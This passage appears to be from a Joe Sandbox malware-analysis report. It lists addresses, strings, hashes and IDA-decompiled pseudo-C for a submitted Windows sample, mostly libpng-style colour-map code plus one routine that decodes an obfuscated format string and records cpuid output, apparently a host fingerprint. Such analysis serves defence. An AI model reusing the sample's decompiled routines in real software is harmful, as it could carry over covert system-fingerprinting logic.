0x004195be
0x00419638
0x00419674
0x0041968b
0x00419676
0x00419676
0x00419676
0x004196a0
0x0041963a
0x0041963e
0x00419655
0x00419640
0x00419640
0x00419640
0x0041966b
0x0041966b
0x004196a6
0x004195c0
0x004195c4
0x004195ff
0x00419616
0x00419601
0x00419601
0x00419601
0x00419622
0x00419629
0x004195c6
0x004195ca
0x004195e1
0x004195cc
0x004195cc
0x004195cc
0x004195ef
0x004195f6
0x004195f6
0x0041962f
0x0041962f
0x004196a9
0x004196ac
0x004196bb
0x004196bd
0x004196c3
0x004196c9
0x004196cc
0x004196d5
0x004196fc
0x004196fe
0x004196d7
0x004196ef
0x004196f2
0x004196f2
0x004196d5
0x00419706
0x00000000
0x00000000
0x00419710
0x00419719
0x00419722
0x00419722
0x00419b52
0x00419b56
0x00419b76
0x00419b76
0x00419b6e
0x00419b71
0x00000000
0x00419b71
0x00000000
0x00419594

Strings

internal row logic error, xrefs: 0041944C
internal row size calculation error, xrefs: 00419499
internal row width error, xrefs: 004194AD
invalid user transform pixel depth, xrefs: 00419734

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID:
String ID: internal row logic error$internal row size calculation error$internal row width error$invalid user transform pixel depth
API String ID: 0-64619857
Opcode ID: 21e1e9baa43ad3f4e6317befbdd171321aef90f08fa07b5c7fcd9d0575a30f08
Instruction ID: 943c974c9a9645007be0eaa68fd7989bc127af7d67ed29ffe76b20b84d248485
Opcode Fuzzy Hash: 21e1e9baa43ad3f4e6317befbdd171321aef90f08fa07b5c7fcd9d0575a30f08
Instruction Fuzzy Hash: B852D574E04249DFCB18CF98D5A0AEEBBB2FF88304F24815AD815AB354D734AA85CF55

Uniqueness

Uniqueness Score: -1,00%

Function 004012EF, Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 100
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E004012EF(unsigned int __ecx, unsigned int __edx, CHAR* _a4, unsigned int _a8) {
				unsigned int _v8;
				unsigned int _v12;
				unsigned int _v16;
				unsigned int _v20;
				CHAR* _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				unsigned int _t42;
				CHAR* _t43;
				unsigned int _t44;
				unsigned int _t69;
				CHAR* _t70;

				_t69 = __edx;
				_t44 = __ecx;
				_v36 = 0;
				_v35 = 0x75;
				_v34 = 8;
				_v33 = 0x75;
				_v32 = 0xdf;
				_v31 = 0xdc;
				_v30 = 0xd1;
				_v29 = 0x83;
				_v28 = 0xf5;
				_v27 = 0x41;
				_v26 = 0xc5;
				_v25 = 0x18;
				_v24 = E00402F3D( &_v36);
				asm("pushad");
				asm("cpuid");
				_v8 = _a8;
				_v12 = _t42;
				_v16 = _t44;
				_v20 = _t69;
				asm("popad");
				_t31 = _v8;
				_t43 = _v24;
				_t70 = _a4;
				wsprintfA(_t70, _t43, _v8, _v8 >> 8, _t31 >> 0x10, _t31 >> 0x18);
				_t33 = _v12;
				_t24 =  &(_t70[4]); // 0x4
				wsprintfA(_t24, _t43, _v12, _v12 >> 8, _t33 >> 0x10, _t33 >> 0x18);
				_t36 = _v16;
				_t26 =  &(_t70[8]); // 0x8
				wsprintfA(_t26, _t43, _v16, _v16 >> 8, _t36 >> 0x10, _t36 >> 0x18);
				wsprintfA( &(_t70[0xc]), _t43, _v20, _v20 >> 8, _v20 >> 0x10, _t39 >> 0x18);
				return E00401686(_t43);
			}

0x004012ef
0x004012ef
0x004012fb
0x004012ff
0x00401303
0x00401307
0x0040130b
0x0040130f
0x00401313
0x00401317
0x0040131b
0x0040131f
0x00401323
0x00401327
0x00401330
0x00401333
0x00401337
0x00401339
0x0040133c
0x0040133f
0x00401342
0x00401345
0x00401346
0x00401349
0x0040134c
0x0040136a
0x0040136c
0x00401382
0x00401387
0x00401389
0x0040139f
0x004013a4
0x004013c4
0x004013d3

APIs

wsprintfA.USER32 ref: 0040136A
wsprintfA.USER32 ref: 00401387
wsprintfA.USER32 ref: 004013A4
wsprintfA.USER32 ref: 004013C4

Part of subcall function 00401686: HeapFree.KERNEL32(00000000,00000000,004011C3), ref: 00401692

Strings

u, xrefs: 00401307
A, xrefs: 0040131F
u, xrefs: 004012FF

Memory Dump Source

Source File: 00000000.00000002.1499996558.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1499976703.00400000.00000002.sdmp Download File
Associated: 00000000.00000002.1500023558.00405000.00000002.sdmp Download File
Associated: 00000000.00000002.1500032102.00406000.00000004.sdmp Download File
Associated: 00000000.00000002.1500050558.00408000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: wsprintf$FreeHeap
String ID: A$u$u
API String ID: 3532733980-257716259
Opcode ID: 643a424faf0c3e65803843c2d806f498a119c94cf877177b8f33028899b9befa
Instruction ID: ad7bb15660edab1eac279870ef987fa10e2da07304710e1b6c33229d344c6fb6
Opcode Fuzzy Hash: 643a424faf0c3e65803843c2d806f498a119c94cf877177b8f33028899b9befa
Instruction Fuzzy Hash: 683193A0A0424AABDB0987BC8C599BFBBED9B95210F04035DF856F33C2D6742A5087F5

Uniqueness

Uniqueness Score: -1,00%

Function 00446D8D, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 00446DA4
_wcscmp.LIBCMT ref: 00446DB5
GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00447053,?,00000000), ref: 00446DD1
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00447053,?,00000000), ref: 00446DFB

Strings

ACP, xrefs: 00446D9E
OCP, xrefs: 00446DAF

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: InfoLocale_wcscmp
String ID: ACP$OCP
API String ID: 1351282208-711371036
Opcode ID: 67949d57ea8d49f539f467aea11411687ba60c00bbaf13c42cf8ca5a3bcf23e1
Instruction ID: 410b759d7b9e985cd49cfb5ec2d12e2205ed9ce0426d5ca970533a5272a719d7
Opcode Fuzzy Hash: 67949d57ea8d49f539f467aea11411687ba60c00bbaf13c42cf8ca5a3bcf23e1
Instruction Fuzzy Hash: 6C01D23570051AABFB20AF15DC01FD633D8AF02769F158027F504CB150E728D94187DE

Uniqueness

Uniqueness Score: -1,00%

Function 0040B4E2, Relevance: 9.3, Strings: 7, Instructions: 578
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E0040B4E2(void* __fp0) {
				void* _t309;
				void* _t312;
				intOrPtr _t349;
				void* _t357;
				intOrPtr _t359;
				intOrPtr _t380;
				intOrPtr _t383;
				void* _t560;
				void* _t562;
				void* _t564;
				void* _t571;
				void* _t587;

				_t587 = __fp0;
				if(( *(_t560 - 0x2c) & 0x00000002) != 0) {
					 *(_t560 - 0x30) = 1;
					if(( *( *((intOrPtr*)(_t560 - 0x20)) + 0x14f) & 0x000000ff) == 6 || ( *( *((intOrPtr*)(_t560 - 0x20)) + 0x148) & 0x0000ffff) > 0) {
						if(( *(_t560 - 0x2c) & 0x00000001) == 0) {
							 *(_t560 - 0xb0) = (( *(_t560 - 0x2c) & 0x00000003) + 1) * ((( *(_t560 - 0x2c) & 0x00000004) >> 2) + 1);
							if( *((intOrPtr*)( *((intOrPtr*)(_t560 - 0x34)) + 0x18)) < 0xf4) {
								E0041B170( *((intOrPtr*)(_t560 - 0x20)), "rgb-alpha color-map: too few entries");
							}
							 *((intOrPtr*)(_t560 - 0xc)) = L0040CC30( *((intOrPtr*)(_t560 - 0x14)));
							E0040C360(_t587,  *((intOrPtr*)(_t560 - 0x14)),  *((intOrPtr*)(_t560 - 0xc)),  *(_t560 - 0x1c),  *(_t560 - 0x28),  *(_t560 - 0x18), 0,  *((intOrPtr*)(_t560 - 0x24)));
							_t564 = _t562 + 0x20;
							if( *((intOrPtr*)(_t560 - 0x24)) != 2) {
								 *(_t560 - 0xbc) =  *(_t560 - 0x1c);
								 *(_t560 - 0xb8) =  *(_t560 - 0x28);
								 *(_t560 - 0xb4) =  *(_t560 - 0x28);
							} else {
								 *(_t560 - 0xbc) = ( *(0x44f350 + ( *(_t560 - 0x1c) * 0xff >> 0xf) * 2) & 0x0000ffff) + (( *(_t560 - 0x1c) * 0x000000ff & 0x00007fff) * ( *(( *(_t560 - 0x1c) * 0xff >> 0xf) + 0x44f750) & 0x000000ff) >> 0x0000000c) >> 0x00000008 & 0xff;
								 *(_t560 - 0xb8) = ( *(0x44f350 + ( *(_t560 - 0x28) * 0xff >> 0xf) * 2) & 0x0000ffff) + (( *(_t560 - 0x28) * 0x000000ff & 0x00007fff) * ( *(( *(_t560 - 0x28) * 0xff >> 0xf) + 0x44f750) & 0x000000ff) >> 0x0000000c) >> 0x00000008 & 0xff;
								 *(_t560 - 0xb4) = ( *(0x44f350 + ( *(_t560 - 0x18) * 0xff >> 0xf) * 2) & 0x0000ffff) + (( *(_t560 - 0x18) * 0x000000ff & 0x00007fff) * ( *(( *(_t560 - 0x18) * 0xff >> 0xf) + 0x44f750) & 0x000000ff) >> 0x0000000c) >> 0x00000008 & 0xff;
							}
							asm("repe cmpsb");
							if(0 == 0) {
								 *((char*)(_t560 - 0xc8)) = 0;
								 *((short*)(_t560 - 0xc6)) =  *(_t560 - 0x1c);
								 *((short*)(_t560 - 0xc4)) =  *(_t560 - 0x28);
								 *((short*)(_t560 - 0xc0)) =  *((intOrPtr*)(_t560 - 0xc4));
								 *((short*)(_t560 - 0xc2)) =  *(_t560 - 0x18);
								L0041BD70( *((intOrPtr*)(_t560 - 0x20)), _t560 - 0xc8, 1, 0, 0);
								_t564 = _t564 + 0x14;
								 *(_t560 - 8) = 3;
							} else {
								 *((intOrPtr*)(_t560 - 0x10)) =  *((intOrPtr*)(_t560 - 0xc));
								 *((intOrPtr*)(_t560 - 0xc)) =  *((intOrPtr*)(_t560 - 0xc)) + 1;
								 *(_t560 - 0xbc) = 0;
								while( *(_t560 - 0xbc) < 0x100) {
									 *(_t560 - 0xb8) = 0;
									while( *(_t560 - 0xb8) < 0x100) {
										 *(_t560 - 0xb4) = 0;
										while( *(_t560 - 0xb4) < 0x100) {
											 *((intOrPtr*)(_t560 - 0xf4)) =  *((intOrPtr*)(_t560 - 0xc));
											_t309 = E0040C1A0( *((intOrPtr*)(_t560 - 0x14)),  *(_t560 - 0xb4), 1, 0x80,  *(_t560 - 0x18),  *((intOrPtr*)(_t560 - 0x24)));
											_t312 = E0040C1A0( *((intOrPtr*)(_t560 - 0x14)),  *(_t560 - 0xb8), 1, 0x80,  *(_t560 - 0x28),  *((intOrPtr*)(_t560 - 0x24)));
											E0040C360(_t587,  *((intOrPtr*)(_t560 - 0x14)),  *((intOrPtr*)(_t560 - 0xf4)), E0040C1A0( *((intOrPtr*)(_t560 - 0x14)),  *(_t560 - 0xbc), 1, 0x80,  *(_t560 - 0x1c),  *((intOrPtr*)(_t560 - 0x24))), _t312, _t309, 0,  *((intOrPtr*)(_t560 - 0x24)));
											_t564 = _t564 + 0x64;
											 *((intOrPtr*)(_t560 - 0xc)) =  *((intOrPtr*)(_t560 - 0xc)) + 1;
											 *(_t560 - 0xb4) =  *(_t560 - 0xb4) << 0x00000001 | 0x0000007f;
										}
										 *(_t560 - 0xb8) =  *(_t560 - 0xb8) << 0x00000001 | 0x0000007f;
									}
									 *(_t560 - 0xbc) =  *(_t560 - 0xbc) << 0x00000001 | 0x0000007f;
								}
								 *(_t560 - 4) = 1;
								 *(_t560 - 8) = 4;
							}
						} else {
							if( *((intOrPtr*)( *((intOrPtr*)(_t560 - 0x34)) + 0x18)) < 0xf4) {
								E0041B170( *((intOrPtr*)(_t560 - 0x20)), "rgb+alpha color-map: too few entries");
							}
							 *((intOrPtr*)(_t560 - 0xc)) = L0040CC30( *((intOrPtr*)(_t560 - 0x14)));
							E0040C360(_t587,  *((intOrPtr*)(_t560 - 0x14)),  *((intOrPtr*)(_t560 - 0xc)), 0xff, 0xff, 0xff, 0, 1);
							_t564 = _t562 + 0x20;
							 *((intOrPtr*)(_t560 - 0x10)) =  *((intOrPtr*)(_t560 - 0xc));
							 *((intOrPtr*)(_t560 - 0xc)) =  *((intOrPtr*)(_t560 - 0xc)) + 1;
							 *(_t560 - 0xa4) = 0;
							while( *(_t560 - 0xa4) < 0x100) {
								 *(_t560 - 0xa8) = 0;
								while( *(_t560 - 0xa8) < 0x100) {
									 *(_t560 - 0xac) = 0;
									while( *(_t560 - 0xac) < 0x100) {
										 *((intOrPtr*)(_t560 - 0xf0)) =  *((intOrPtr*)(_t560 - 0xc));
										E0040C360(_t587,  *((intOrPtr*)(_t560 - 0x14)),  *((intOrPtr*)(_t560 - 0xf0)),  *(_t560 - 0xa4),  *(_t560 - 0xa8),  *(_t560 - 0xac), 0x80, 1);
										_t564 = _t564 + 0x1c;
										 *((intOrPtr*)(_t560 - 0xc)) =  *((intOrPtr*)(_t560 - 0xc)) + 1;
										 *(_t560 - 0xac) =  *(_t560 - 0xac) << 0x00000001 | 0x0000007f;
									}
									 *(_t560 - 0xa8) =  *(_t560 - 0xa8) << 0x00000001 | 0x0000007f;
								}
								 *(_t560 - 0xa4) =  *(_t560 - 0xa4) << 0x00000001 | 0x0000007f;
							}
							 *(_t560 - 4) = 1;
							 *(_t560 - 8) = 4;
						}
					} else {
						if( *((intOrPtr*)( *((intOrPtr*)(_t560 - 0x34)) + 0x18)) < 0xd8) {
							E0041B170( *((intOrPtr*)(_t560 - 0x20)), "rgb color-map: too few entries");
						}
						_t349 = L0040CC30( *((intOrPtr*)(_t560 - 0x14)));
						_t564 = _t562 + 4;
						 *((intOrPtr*)(_t560 - 0xc)) = _t349;
						 *(_t560 - 8) = 3;
					}
				} else {
					E0041C270( *((intOrPtr*)(_t560 - 0x20)), 1, 0xffffffff, 0xffffffff);
					_t571 = _t562 + 0x10;
					 *(_t560 - 0x30) = 1;
					if(( *( *((intOrPtr*)(_t560 - 0x20)) + 0x14f) & 0x000000ff) == 6 || ( *( *((intOrPtr*)(_t560 - 0x20)) + 0x148) & 0x0000ffff) > 0) {
						if(( *(_t560 - 0x2c) & 0x00000001) == 0) {
							goto L7;
						} else {
							 *(_t560 - 4) = 1;
							if( *((intOrPtr*)( *((intOrPtr*)(_t560 - 0x34)) + 0x18)) < 0x100) {
								E0041B170( *((intOrPtr*)(_t560 - 0x20)), "rgb[ga] color-map: too few entries");
							}
							_t383 = L0040CB20( *((intOrPtr*)(_t560 - 0x14)));
							_t564 = _t571 + 4;
							 *((intOrPtr*)(_t560 - 0xc)) = _t383;
							 *((intOrPtr*)(_t560 - 0x10)) = 0xe7;
							 *(_t560 - 8) = 1;
						}
					} else {
						L7:
						if( *((intOrPtr*)( *((intOrPtr*)(_t560 - 0x34)) + 0x18)) < 0x100) {
							E0041B170( *((intOrPtr*)(_t560 - 0x20)), "rgb[gray] color-map: too few entries");
						}
						if(( *( *((intOrPtr*)(_t560 - 0x20)) + 0x14f) & 0x000000ff) == 6) {
							L11:
							_t440 =  *((intOrPtr*)( *((intOrPtr*)(_t560 - 0x20)) + 0x2c4));
							_t357 = E0040C160( *((intOrPtr*)( *((intOrPtr*)(_t560 - 0x20)) + 0x2c4)));
							_t571 = _t571 + 4;
							if(_t357 == 0) {
								goto L13;
							} else {
								_t380 = L0040CA80(_t440,  *((intOrPtr*)(_t560 - 0x14)));
								_t564 = _t571 + 4;
								 *((intOrPtr*)(_t560 - 0xc)) = _t380;
								 *(_t560 - 0x30) = 3;
							}
						} else {
							_t440 =  *((intOrPtr*)(_t560 - 0x20));
							if(( *( *((intOrPtr*)(_t560 - 0x20)) + 0x148) & 0x0000ffff) <= 0) {
								L13:
								_t359 = L0040CAD0(_t440,  *((intOrPtr*)(_t560 - 0x14)));
								_t564 = _t571 + 4;
								 *((intOrPtr*)(_t560 - 0xc)) = _t359;
							} else {
								goto L11;
							}
						}
						if(( *( *((intOrPtr*)(_t560 - 0x20)) + 0x14f) & 0x000000ff) == 6 || ( *( *((intOrPtr*)(_t560 - 0x20)) + 0x148) & 0x0000ffff) > 0) {
							 *(_t560 - 0x94) =  *(_t560 - 0x28);
							if( *(_t560 - 0x30) != 3) {
								if( *((intOrPtr*)(_t560 - 0x24)) == 2) {
									 *(_t560 - 0x94) = ( *(0x44f350 + ( *(_t560 - 0x94) * 0xff >> 0xf) * 2) & 0x0000ffff) + (( *(_t560 - 0x94) * 0x000000ff & 0x00007fff) * ( *(( *(_t560 - 0x94) * 0xff >> 0xf) + 0x44f750) & 0x000000ff) >> 0x0000000c) >> 0x00000008 & 0xff;
									E0040C360(_t587,  *((intOrPtr*)(_t560 - 0x14)),  *(_t560 - 0x94),  *(_t560 - 0x28),  *(_t560 - 0x28),  *(_t560 - 0x28), 0, 2);
									_t564 = _t564 + 0x1c;
								}
							} else {
								if( *((intOrPtr*)(_t560 - 0x24)) == 1) {
									 *(_t560 - 0x94) =  *(0x44f150 +  *(_t560 - 0x94) * 2) & 0x0000ffff;
								}
								_push( *((intOrPtr*)( *((intOrPtr*)(_t560 - 0x20)) + 0x2c4)));
								 *(_t560 - 0x94) = 0x807f + (E00411930(_t587,  *(_t560 - 0x94)) & 0x0000ffff) * 0xff >> 0x10;
								E0040C360(_t587,  *((intOrPtr*)(_t560 - 0x14)),  *(_t560 - 0x94),  *(_t560 - 0x28),  *(_t560 - 0x28),  *(_t560 - 0x28), 0,  *((intOrPtr*)(_t560 - 0x24)));
								_t564 = _t564 + 0x24;
							}
							 *((char*)(_t560 - 0xa0)) = 0;
							 *((short*)(_t560 - 0x9a)) =  *(_t560 - 0x94);
							 *((short*)(_t560 - 0x9c)) =  *((intOrPtr*)(_t560 - 0x9a));
							 *((short*)(_t560 - 0x9e)) =  *((intOrPtr*)(_t560 - 0x9c));
							 *((short*)(_t560 - 0x98)) =  *((intOrPtr*)(_t560 - 0x9e));
							 *(_t560 - 4) = 1;
							L0041BD70( *((intOrPtr*)(_t560 - 0x20)), _t560 - 0xa0, 1, 0, 0);
							_t564 = _t564 + 0x14;
						}
						 *(_t560 - 8) = 0;
					}
				}
				if( *(_t560 - 4) != 0 && ( *( *((intOrPtr*)(_t560 - 0x20)) + 0x148) & 0x0000ffff) > 0 && ( *( *((intOrPtr*)(_t560 - 0x20)) + 0x14f) & 4) == 0) {
					E0041C1A0( *((intOrPtr*)(_t560 - 0x20)));
					_t564 = _t564 + 4;
				}
				 *(_t560 - 0x108) =  *(_t560 - 0x30);
				if( *(_t560 - 0x108) == 1) {
					L0041BF20(_t587,  *((intOrPtr*)(_t560 - 0x20)), 0, 0x35b60);
					_t564 = _t564 + 0xc;
					goto L76;
				} else {
					if( *(_t560 - 0x108) == 3) {
						L76:
						if(( *( *((intOrPtr*)(_t560 - 0x20)) + 0x150) & 0x000000ff) > 8) {
							L0041BEC0( *((intOrPtr*)(_t560 - 0x20)));
						}
					} else {
					}
				}
				if( *((intOrPtr*)(_t560 - 0xc)) > 0x100 ||  *((intOrPtr*)(_t560 - 0xc)) >  *((intOrPtr*)( *((intOrPtr*)(_t560 - 0x34)) + 0x18))) {
					E0041B170( *((intOrPtr*)(_t560 - 0x20)), "color map overflow (BAD internal error)");
				}
				 *((intOrPtr*)( *((intOrPtr*)(_t560 - 0x34)) + 0x18)) =  *((intOrPtr*)(_t560 - 0xc));
				 *(_t560 - 0x10c) =  *(_t560 - 8);
				if( *(_t560 - 0x10c) > 4) {
					E0041B170( *((intOrPtr*)(_t560 - 0x20)), "bad processing option (internal error)");
					goto L100;
				} else {
					switch( *((intOrPtr*)( *(_t560 - 0x10c) * 4 +  &M0040C144))) {
						case 0:
							if( *((intOrPtr*)(_t560 - 0x10)) != 0x100) {
								goto L100;
							}
							goto L101;
						case 1:
							if( *((intOrPtr*)(__ebp - 0x10)) != 0xe7) {
								goto L100;
							}
							goto L101;
						case 2:
							__ecx =  *((intOrPtr*)(__ebp - 0x10));
							if( *((intOrPtr*)(__ebp - 0x10)) >=  *((intOrPtr*)(__ebp - 0xc)) ||  *((intOrPtr*)(__ebp - 0x10)) != 0xfe) {
								goto L100;
							} else {
							}
							goto L101;
						case 3:
							if( *((intOrPtr*)(__ebp - 0x10)) != 0x100) {
								goto L100;
							}
							goto L101;
						case 4:
							if( *((intOrPtr*)(__ebp - 0x10)) == 0xd8) {
							} else {
								L100:
								E0041B170( *((intOrPtr*)(_t560 - 0x20)), "bad background index (internal error)");
							}
							goto L101;
					}
				}
				L101:
				 *( *((intOrPtr*)(_t560 - 0x14)) + 0x28) =  *(_t560 - 8);
				return 1;
			}

0x0040b4e2
0x0040b4e8
0x0040b775
0x0040b789
0x0040b7a3
0x0040b8fb
0x0040b90b
0x0040b916
0x0040b916
0x0040b927
0x0040b944
0x0040b949
0x0040b950
0x0040ba49
0x0040ba52
0x0040ba5b
0x0040b956
0x0040b99f
0x0040b9ef
0x0040ba3e
0x0040ba3e
0x0040bac9
0x0040bacb
0x0040bc1a
0x0040bc25
0x0040bc30
0x0040bc3e
0x0040bc49
0x0040bc61
0x0040bc66
0x0040bc69
0x0040bad1
0x0040bad4
0x0040badd
0x0040bae0
0x0040bafd
0x0040bb0d
0x0040bb2a
0x0040bb3a
0x0040bb57
0x0040bb6a
0x0040bb90
0x0040bbb3
0x0040bbea
0x0040bbef
0x0040bbf8
0x0040bb51
0x0040bb51
0x0040bb24
0x0040bb24
0x0040baf7
0x0040baf7
0x0040bc0a
0x0040bc11
0x0040bc11
0x0040b7a9
0x0040b7b3
0x0040b7be
0x0040b7be
0x0040b7cf
0x0040b7ed
0x0040b7f2
0x0040b7f8
0x0040b801
0x0040b804
0x0040b821
0x0040b831
0x0040b84e
0x0040b85a
0x0040b877
0x0040b886
0x0040b8b3
0x0040b8b8
0x0040b8c1
0x0040b871
0x0040b871
0x0040b848
0x0040b848
0x0040b81b
0x0040b81b
0x0040b8d0
0x0040b8d7
0x0040b8d7
0x0040bc72
0x0040bc7c
0x0040bc87
0x0040bc87
0x0040bc90
0x0040bc95
0x0040bc98
0x0040bc9b
0x0040bc9b
0x0040b4ee
0x0040b4f8
0x0040b4fd
0x0040b500
0x0040b514
0x0040b52a
0x00000000
0x0040b52c
0x0040b52c
0x0040b53d
0x0040b548
0x0040b548
0x0040b551
0x0040b556
0x0040b559
0x0040b55c
0x0040b563
0x0040b563
0x0040b56f
0x0040b56f
0x0040b579
0x0040b584
0x0040b584
0x0040b596
0x0040b5a6
0x0040b5a9
0x0040b5b0
0x0040b5b5
0x0040b5ba
0x00000000
0x0040b5bc
0x0040b5c0
0x0040b5c5
0x0040b5c8
0x0040b5cb
0x0040b5cb
0x0040b598
0x0040b598
0x0040b5a4
0x0040b5d4
0x0040b5d8
0x0040b5dd
0x0040b5e0
0x00000000
0x00000000
0x00000000
0x0040b5a4
0x0040b5f0
0x0040b607
0x0040b611
0x0040b68c
0x0040b6e1
0x0040b702
0x0040b707
0x0040b707
0x0040b613
0x0040b617
0x0040b627
0x0040b627
0x0040b636
0x0040b658
0x0040b67b
0x0040b680
0x0040b680
0x0040b70a
0x0040b718
0x0040b726
0x0040b734
0x0040b742
0x0040b749
0x0040b761
0x0040b766
0x0040b766
0x0040b769
0x0040b769
0x0040b770
0x0040bfec
0x0040c00f
0x0040c014
0x0040c014
0x0040c01a
0x0040c027
0x0040c03f
0x0040c044
0x00000000
0x0040c029
0x0040c030
0x0040c047
0x0040c054
0x0040c05a
0x0040c05f
0x00000000
0x0040c032
0x0040c030
0x0040c069
0x0040c07f
0x0040c07f
0x0040c08a
0x0040c090
0x0040c09d
0x0040c0fe
0x00000000
0x0040c09f
0x0040c0a5
0x00000000
0x0040c0b3
0x00000000
0x0040c0b5
0x00000000
0x00000000
0x0040c0c0
0x00000000
0x0040c0c2
0x00000000
0x00000000
0x0040c0c6
0x0040c0cc
0x00000000
0x00000000
0x0040c0d9
0x00000000
0x00000000
0x0040c0e2
0x00000000
0x0040c0e4
0x00000000
0x00000000
0x0040c0ef
0x0040c0f1
0x0040c103
0x0040c10c
0x0040c10c
0x00000000
0x00000000
0x0040c0a5
0x0040c111
0x0040c117
0x0040c124

Strings

rgb color-map: too few entries, xrefs: 0040BC7E
color map overflow (BAD internal error), xrefs: 0040C076
bad background index (internal error), xrefs: 0040C103
rgb[ga] color-map: too few entries, xrefs: 0040B53F
rgb[gray] color-map: too few entries, xrefs: 0040B57B
rgb-alpha color-map: too few entries, xrefs: 0040B90D
rgb+alpha color-map: too few entries, xrefs: 0040B7B5

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID:
String ID: bad background index (internal error)$color map overflow (BAD internal error)$rgb color-map: too few entries$rgb+alpha color-map: too few entries$rgb-alpha color-map: too few entries$rgb[ga] color-map: too few entries$rgb[gray] color-map: too few entries
API String ID: 0-465930127
Opcode ID: 9782fbdc44d77f497459d02eff38762aae9381ace50494731965a8a20db0fc55
Instruction ID: 470b7b505abdde4a49340cf9eb1ae022b4154f72dd114a0a7d83904ea69b46b3
Opcode Fuzzy Hash: 9782fbdc44d77f497459d02eff38762aae9381ace50494731965a8a20db0fc55
Instruction Fuzzy Hash: A9326E71E00219DBDB14CF94C891BEEB3B6FF98304F1481AAE5097B291D7789A81CF59

Uniqueness

Uniqueness Score: -1,00%

Function 0040DE10, Relevance: 6.8, Strings: 5, Instructions: 577COMMON

Download Yara Rule

Strings

lost/gained channels, xrefs: 0040DE9F
unexpected compose, xrefs: 0040DE79
lost rgb to gray, xrefs: 0040DE5D
unexpected 8-bit transformation, xrefs: 0040DEC3
unknown interlace type, xrefs: 0040DF06

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID:
String ID: lost rgb to gray$lost/gained channels$unexpected 8-bit transformation$unexpected compose$unknown interlace type
API String ID: 0-1402837969
Opcode ID: 41948e94ff67e639edb25e0a66ad8ed5ce114a764c4b8c1866b2af1b55113cd2
Instruction ID: 13519c04f47f2225772805537607dbe0396479fd16f7943add7aff5cab7eebb0
Opcode Fuzzy Hash: 41948e94ff67e639edb25e0a66ad8ed5ce114a764c4b8c1866b2af1b55113cd2
Instruction Fuzzy Hash: 53423C74E04219CFDB18CF99C890BADBBB2FF89304F1485AAD855AB385C738A955CF44

Uniqueness

Uniqueness Score: -1,00%

Function 0040B0C4, Relevance: 6.6, Strings: 5, Instructions: 344
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E0040B0C4(void* __fp0) {
				signed int _t195;
				signed int _t272;
				void* _t389;
				void* _t391;
				void* _t392;
				void* _t393;
				void* _t407;

				_t407 = __fp0;
				 *(_t389 - 0x30) = 1;
				if(( *(_t389 - 0x2c) & 0x00000001) == 0) {
					if(( *(_t389 - 0x2c) & 0x00000002) == 0 ||  *(_t389 - 0x1c) ==  *(_t389 - 0x28) &&  *(_t389 - 0x28) ==  *(_t389 - 0x18)) {
						 *(_t389 - 0x60) =  *(_t389 - 0x28);
						if( *( *((intOrPtr*)(_t389 - 0x34)) + 0x18) < 0x100) {
							E0041B170( *((intOrPtr*)(_t389 - 0x20)), "gray-alpha color-map: too few entries");
						}
						_t195 = L0040CAD0( *((intOrPtr*)(_t389 - 0x14)),  *((intOrPtr*)(_t389 - 0x14)));
						_t392 = _t391 + 4;
						 *(_t389 - 0xc) = _t195;
						if( *((intOrPtr*)(_t389 - 0x24)) == 2) {
							 *(_t389 - 0x60) = ( *(0x44f350 + ( *(_t389 - 0x60) * 0xff >> 0xf) * 2) & 0x0000ffff) + (( *(_t389 - 0x60) * 0x000000ff & 0x00007fff) * ( *(( *(_t389 - 0x60) * 0xff >> 0xf) + 0x44f750) & 0x000000ff) >> 0x0000000c) >> 0x00000008 & 0xff;
							E0040C360(_t407,  *((intOrPtr*)(_t389 - 0x14)),  *(_t389 - 0x60),  *(_t389 - 0x28),  *(_t389 - 0x28),  *(_t389 - 0x28), 0xffff, 2);
